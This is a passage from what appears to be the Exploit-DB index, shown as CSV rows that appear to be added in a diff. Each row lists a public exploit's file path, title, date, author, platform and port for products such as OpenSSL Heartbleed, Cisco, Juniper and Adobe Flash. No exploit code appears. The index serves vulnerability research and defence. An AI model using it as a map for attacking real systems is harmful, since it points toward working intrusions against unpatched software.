(Metasploit)",2014-03-22,Metasploit,remote,php,80 +32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,remote,hardware,22 +32442,exploits/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,remote,windows, +32445,exploits/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",remote,linux, +32456,exploits/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal",2008-10-03,dmnt,remote,windows, +32457,exploits/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection",2008-10-03,"Jaykishan Nirmal",remote,windows, +32458,exploits/multiple/remote/32458.txt,"OpenNMS 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",remote,multiple, +32460,exploits/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'Phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",remote,windows, +32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows, +32466,exploits/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 - Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",remote,multiple, +32469,exploits/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",remote,hardware, +32470,exploits/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,remote,linux, +32475,exploits/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",remote,multiple, +32564,exploits/multiple/remote/32564.txt,"XWork < 2.0.11.2 - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",remote,multiple, +32489,exploits/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",remote,windows, +32491,exploits/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Remote Buffer Overflow",2008-10-16,"Thomas Pollet",remote,windows, +32493,exploits/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,remote,windows, +32515,exploits/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,remote,linux,443 +32517,exploits/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows, +32518,exploits/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows, +32529,exploits/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",remote,multiple, +32530,exploits/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",remote,linux, +32548,exploits/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",remote,linux, +32552,exploits/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,remote,hardware, +32555,exploits/windows/remote/32555.html,"Opera Web Browser 9.62 - History Search Input Validation",2008-10-31,NeoCoderz,remote,windows, +32565,exploits/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",remote,multiple, +32568,exploits/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",remote,windows,80 +32578,exploits/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",remote,windows, +32582,exploits/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass",2008-11-12,"Craig Heffner",remote,hardware, +32586,exploits/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",remote,windows, +32621,exploits/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,remote,php,80 +32591,exploits/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Vulnerabilities",2008-11-19,"Adrian Pastor",remote,hardware, +32599,exploits/hardware/remote/32599.txt,"Linksys WRT160N - 'apply.cgi' Cross-Site Scripting",2008-11-27,"David Gil",remote,hardware, +32618,exploits/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,remote,php, +32643,exploits/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",remote,windows,5060 +32654,exploits/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",remote,windows, +32673,exploits/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",remote,multiple, +32674,exploits/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",remote,multiple, +32681,exploits/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",remote,hardware, +32684,exploits/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,remote,windows, +32686,exploits/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,remote,multiple, +32690,exploits/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",remote,linux, +32691,exploits/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",remote,linux, +32699,exploits/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",remote,windows, +32711,exploits/windows/remote/32711.txt,"Multiple CA Service Management Products - Remote Command Execution",2009-01-07,"Michel Arboi",remote,windows, +32723,exploits/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",remote,hardware, +32725,exploits/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal (Metasploit)",2014-04-07,Metasploit,remote,windows,8080 +32738,exploits/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution",2014-04-08,Vulnerability-Lab,remote,ios, +32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",remote,hardware, +32745,exploits/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure",2014-04-08,"Jared Stafford",remote,multiple,443 +32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware, +32762,exploits/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",remote,multiple, +32764,exploits/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)",2014-04-09,"Fitzl Csaba",remote,multiple,443 +32776,exploits/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,remote,hardware, +32780,exploits/linux/remote/32780.py,"PyCrypto ARC2 Module - Remote Buffer Overflow",2009-02-07,"Mike Wiacek",remote,linux, +32781,exploits/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",remote,multiple, +32789,exploits/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,remote,unix,443 +32791,exploits/multiple/remote/32791.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)",2014-04-10,prdelka,remote,multiple,443 +32794,exploits/php/remote/32794.rb,"Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,remote,php,80 +32795,exploits/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",remote,novell, +32796,exploits/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",remote,linux, +32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,remote,multiple, +32799,exploits/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,remote,windows, +32801,exploits/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Cross-Site Scripting",2009-02-05,"Jan Skovgren",remote,hardware, +32811,exploits/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",remote,unix, +32904,exploits/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,remote,windows, +32825,exploits/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",remote,linux, +32826,exploits/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",remote,windows, +32832,exploits/windows/remote/32832.py,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",remote,windows, +32834,exploits/linux/remote/32834.txt,"cURL/libcURL 7.19.3 - HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",remote,linux, +32837,exploits/linux/remote/32837.py,"Wesnoth 1.x - PythonAI Remote Code Execution",2009-02-25,Wesnoth,remote,linux, +32839,exploits/multiple/remote/32839.txt,"IBM Websphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,remote,multiple, +32851,exploits/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",remote,windows, +32876,exploits/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",remote,novell, +32877,exploits/multiple/remote/32877.txt,"Xlight FTP Server 3.2 - 'user' SQL Injection",2009-03-19,fla,remote,multiple, +32878,exploits/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting",2009-03-31,"Bugs NotHugs",remote,hardware, +32879,exploits/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",remote,windows, +32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",remote,unix,443 +32998,exploits/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)",2014-04-24,"Ayman Sagy",remote,multiple, +32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,remote,windows, +32919,exploits/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",remote,hardware, +32920,exploits/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,DSecRG,remote,multiple, +32921,exploits/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,remote,multiple, +32922,exploits/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)",2009-04-16,DSecRG,remote,multiple, +32923,exploits/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,remote,windows, +32925,exploits/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",remote,multiple, +32929,exploits/linux/remote/32929.txt,"RedHat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",remote,linux, +32931,exploits/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",remote,hardware, +32938,exploits/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,remote,hardware,32674 +32942,exploits/linux/remote/32942.txt,"Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",remote,linux, +32944,exploits/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",remote,multiple, +32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple, +32954,exploits/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,remote,hardware, +32955,exploits/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,remote,hardware, +32957,exploits/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",remote,windows, +32959,exploits/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow (Metasploit)",2014-04-21,Metasploit,remote,windows, +32962,exploits/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 - Security Bypass",2009-04-29,J.Greil,remote,cgi, +32965,exploits/linux/remote/32965.c,"GnuTLS 2.6.x - libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",remote,linux, +32967,exploits/multiple/remote/32967.txt,"Openfire 3.x - jabber:iq:auth 'passwd_change' Remote Password Change",2009-05-04,"Daryl Herzmann",remote,multiple, +32971,exploits/multiple/remote/32971.txt,"GlassFish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple, +33352,exploits/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Remote Stack Buffer Overflow",2014-05-14,superkojiman,remote,windows,80 +32978,exploits/multiple/remote/32978.txt,"GlassFish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32974,exploits/multiple/remote/32974.txt,"GlassFish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32975,exploits/multiple/remote/32975.txt,"GlassFish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32977,exploits/multiple/remote/32977.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32979,exploits/multiple/remote/32979.txt,"GlassFish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32980,exploits/multiple/remote/32980.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/configuration/auditModuleEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32981,exploits/multiple/remote/32981.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/resourceNode/jdbcResourceEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple, +32994,exploits/multiple/remote/32994.xml,"Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",remote,multiple, +32996,exploits/multiple/remote/32996.txt,"Nortel Contact Center Manager - Administration Password Disclosure",2009-05-14,"Bernhard Muller",remote,multiple, +33007,exploits/multiple/remote/33007.txt,"Novell Groupwise 8.0 Webaccess - Multiple Vulnerabilities",2009-05-21,"Gregory Duchemin",remote,multiple, +33010,exploits/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 - Log File Remote Format String",2009-05-26,lofi42,remote,hardware, +33016,exploits/hardware/remote/33016.txt,"SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",remote,hardware, +33023,exploits/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration",2009-06-03,"D. Matscheko",remote,multiple, +33024,exploits/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",remote,windows, +33025,exploits/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,remote,windows, +33027,exploits/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Stack Buffer Overflow",2014-04-25,Polunchis,remote,windows,80 +33032,exploits/linux/remote/33032.txt,"Compress::Raw::Zlib Perl Module - Remote Code Execution",2009-05-11,"Leo Bergolth",remote,linux, +33033,exploits/multiple/remote/33033.html,"WebKit - JavaScript 'onload()' Event Cross Domain Scripting",2009-05-08,"Michal Zalewski",remote,multiple, +33034,exploits/linux/remote/33034.txt,"WebKit - XML External Entity Information Disclosure",2009-05-08,"Chris Evans",remote,linux, +33035,exploits/windows/remote/33035.txt,"Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",remote,windows, +33039,exploits/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 / SeaMonkey 1.1.16 - Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",remote,linux, +33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware, +33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware, +33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",remote,hardware, +33047,exploits/multiple/remote/33047.html,"WebKit - 'parent/top' Cross Domain Scripting",2009-05-19,"Gareth Hayes",remote,multiple, +33050,exploits/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 - HTML Attribute JavaScript URI SecURIty Bypass",2009-05-22,80vul,remote,windows, +33051,exploits/cgi/remote/33051.txt,"Nagios 3.0.6 - 'statuswml.cgi' Arbitrary Shell Command Injection",2009-05-22,Paul,remote,cgi, +33053,exploits/linux/remote/33053.txt,"Samba 3.3.5 - Format String / Security Bypass",2009-05-19,"Jeremy Allison",remote,linux, +33054,exploits/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x - Web VPN FTP or CIFS Authentication Form Phishing",2009-05-24,"David Byrne",remote,hardware, +33055,exploits/hardware/remote/33055.html,"Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting",2009-05-24,"Trustwave's SpiderLabs",remote,hardware, +33063,exploits/windows/remote/33063.txt,"Microsoft Internet Explorer 6 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,windows, +33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,multiple, +33066,exploits/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,remote,windows, +33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",remote,multiple, +33071,exploits/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities",2014-04-28,st3n,remote,windows, +33078,exploits/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,remote,multiple, +33079,exploits/multiple/remote/33079.txt,"Oracle WebLogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",remote,multiple, +33081,exploits/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",remote,multiple, +33082,exploits/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",remote,multiple, +33084,exploits/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote Overflow",2009-06-14,"Dennis Yurichev",remote,multiple, +33089,exploits/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",remote,windows, +33351,exploits/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Remote Buffer Overflow",2009-11-12,HACKATTACK,remote,novell, +33580,exploits/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,remote,hardware, +33095,exploits/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,remote,windows, +33103,exploits/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",remote,linux, +33118,exploits/multiple/remote/33118.html,"Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing",2009-06-27,"Juan Pablo Lopez Yacubian",remote,multiple, +33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,remote,multiple, +33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",remote,multiple, +33142,exploits/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-05-02,Metasploit,remote,multiple,8080 +33143,exploits/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",remote,hardware,443 +33162,exploits/php/remote/33162.php,"PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (1)",2009-08-10,"Maksymilian Arciemowicz",remote,php, +33163,exploits/php/remote/33163.php,"PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (2)",2009-08-10,"Maksymilian Arciemowicz",remote,php, +33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,remote,multiple, +33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,remote,hardware, +33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",remote,windows, +33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware, +33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",remote,multiple, +33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple, +33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",remote,windows, +33210,exploits/multiple/remote/33210.txt,"HP Operations Manager - Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,remote,multiple, +33211,exploits/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 - Portal Default Manager Account Remote Security",2009-09-03,Intevydis,remote,multiple, +33212,exploits/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution (Metasploit)",2014-05-06,Metasploit,remote,windows, +33215,exploits/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,remote,multiple, +33234,exploits/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",remote,hardware, +33257,exploits/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface 'PATH_INFO' Cross-Site Scripting",2009-09-22,"Amir Azam",remote,hardware, +33258,exploits/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",remote,hardware, +33259,exploits/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",remote,hardware, +33260,exploits/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - 'scripter.php' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",remote,hardware, +33261,exploits/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J - Web Interface (Multiple Script) 'm[]' Cross-Site Scripting",2009-09-22,"Amir Azam",remote,hardware, +33263,exploits/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",remote,windows, +33265,exploits/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",remote,hardware, +33270,exploits/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,remote,windows, +33272,exploits/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",remote,windows, +33264,exploits/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",remote,windows, +33273,exploits/windows/remote/33273.scn,"Autodesk SoftImage 7.0 Scene - '.TOC' File Remote Code Execution",2009-11-23,"Diego Juarez",remote,windows, +33645,exploits/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,remote,windows, +33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple, +33311,exploits/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",remote,linux, +33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,remote,linux, +33315,exploits/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,remote,linux, +33316,exploits/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,remote,multiple, +33594,exploits/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",remote,windows, +33326,exploits/windows/remote/33326.py,"EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow",2014-05-12,superkojiman,remote,windows, +33331,exploits/windows/remote/33331.rb,"Yokogawa CS3000 - 'BKESimmgr.exe' Remote Buffer Overflow (Metasploit)",2014-05-12,Metasploit,remote,windows,34205 +33333,exploits/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer 